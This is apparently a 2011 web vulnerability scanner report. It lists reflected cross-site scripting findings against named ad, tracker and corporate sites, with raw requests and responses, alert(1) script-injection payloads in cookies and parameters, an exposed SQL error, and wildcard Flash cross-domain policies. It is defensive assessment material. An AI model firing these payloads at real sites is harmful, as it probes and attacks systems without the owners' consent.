FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=122 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:10:02 GMT Connection: close Content-Length: 2537
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1 Host: da.newstogram.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19
The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:19 GMT Server: Apache Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/ Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/ Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly Content-Length: 2946
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:15:05 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2"> ...[SNIP]...
4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://porscheusa.com
Path:
/911GTS-mosaic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:14:56 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1"> ...[SNIP]...
The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1 Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:23:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT" Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/ location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Content-Length: 362 Connection: close Content-Type: application/x-javascript
SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script> ...[SNIP]...
The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:42 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:41 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
5. Flash cross-domain policypreviousnext There are 45 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 18.xg4ken.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:42:55 GMT Server: Apache/2.0.52 (Red Hat) Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT ETag: "3a4007-c6-47b450a15bfc0" Accept-Ranges: bytes Content-Length: 198 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 220marketing9-px.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:08:25 GMT Server: Apache Set-Cookie: RlocalUID=tc%3D11020308082556862; domain=.rtrk.com; path=/ Last-Modified: Sat, 09 May 2009 00:14:34 GMT ETag: "cc-4696fa1390e80" Accept-Ranges: bytes Content-Length: 204 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 69.16.184.135
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 18:52:09 GMT Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Accept-Ranges: none Expires: Thu, 03 Feb 2011 19:52:09 GMT Content-Length: 217 Content-Type: text/xml X-HW: 1296759129.cc031d1
<?xml version="1.0"?> <cross-domain-policy> <!-- This is a master-policy file --> <site-control permitted-cross-domain-policies="all" /> <allow-access-from domain="*" to-ports="80" /> </cross ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.rfihub.com
Response
HTTP/1.1 200 OK P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/xml; charset=iso-8859-1 Content-Length: 199 Connection: keep-alive
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com
Response
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.br.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: admin.brightcove.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753" Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT Accept-Ranges: bytes Content-Length: 386 Content-Type: application/xml Cache-Control: max-age=1200 Date: Thu, 03 Feb 2011 18:53:04 GMT Connection: close
<?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: api.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT Accept-Ranges: bytes ETag: "54d96c63507bcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Date: Thu, 03 Feb 2011 16:01:12 GMT Content-Length: 293
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: beacon.afy11.net
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT Accept-Ranges: bytes ETag: "e732374a5649c71:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c5.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:04:15 GMT ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 247 X-Varnish: 1047669310 Date: Thu, 03 Feb 2011 16:11:49 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c7.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:04:15 GMT ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 247 X-Varnish: 1575557626 Date: Thu, 03 Feb 2011 16:09:41 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a908de3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:06:48 GMT Connection: close Content-Length: 277
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: graph.facebook.com
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=2592000 Content-Type: application/xml Expires: Sat, 05 Mar 2011 16:15:09 GMT Connection: close Content-Length: 280
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: gsbmtg.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:10:20 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:39:12 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: i1.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/v/H9TrHLL-oTU&hl=en_US&fs=1&rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: lab.arc90.com
Response
